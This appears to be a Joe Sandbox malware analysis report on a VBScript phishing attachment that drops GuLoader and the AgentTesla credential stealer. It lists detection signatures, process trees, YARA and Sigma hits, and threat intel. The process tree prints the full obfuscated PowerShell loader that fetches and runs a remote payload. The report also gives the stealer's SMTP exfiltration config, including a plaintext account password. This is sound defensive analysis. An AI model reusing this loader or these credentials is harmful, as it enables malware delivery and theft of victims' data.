Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift_Message#1234323456.vbs

Overview

General Information

Sample name:Swift_Message#1234323456.vbs
Analysis ID:1430117
MD5:78a3e500aa75424e4494cc24d8d2b1f3
SHA1:99b288b4dc02152cedcedd4f40752d55696f8eb1
SHA256:24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6452 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k ';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts (Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5336 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3428 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k ';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts (Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5684 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5808 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.privateemail.com", "Username": "sharon.milton@dasaultfalconjet.com", "Password": "Nigeria@123"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_416.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x102fa:$b2: ::FromBase64String(
            • 0xd676:$s1: -join
            • 0x6e22:$s4: +=
            • 0x6ee4:$s4: +=
            • 0xb10b:$s4: +=
            • 0xd228:$s4: +=
            • 0xd512:$s4: +=
            • 0xd658:$s4: +=
            • 0xf8a5:$s4: +=
            • 0xf925:$s4: +=
            • 0xf9eb:$s4: +=
            • 0xfa6b:$s4: +=
            • 0xfc41:$s4: +=
            • 0xfcc5:$s4: +=
            • 0xdd8e:$e4: Get-WmiObject
            • 0xdf7d:$e4: Get-Process
            • 0xdfd5:$e4: Start-Process
            amsi32_3428.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x10247:$b2: ::FromBase64String(
            • 0xd676:$s1: -join
            • 0x6e22:$s4: +=
            • 0x6ee4:$s4: +=
            • 0xb10b:$s4: +=
            • 0xd228:$s4: +=
            • 0xd512:$s4: +=
            • 0xd658:$s4: +=
            • 0xf8a5:$s4: +=
            • 0xf925:$s4: +=
            • 0xf9eb:$s4: +=
            • 0xfa6b:$s4: +=
            • 0xfc41:$s4: +=
            • 0xfcc5:$s4: +=
            • 0xdd8e:$e4: Get-WmiObject
            • 0xdf7d:$e4: Get-Process
            • 0xdfd5:$e4: Start-Process
            • 0x175a5:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", ProcessId: 6452, ProcessName: wscript.exe
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.29.159.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 5808, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49726
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", ProcessId: 6452, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
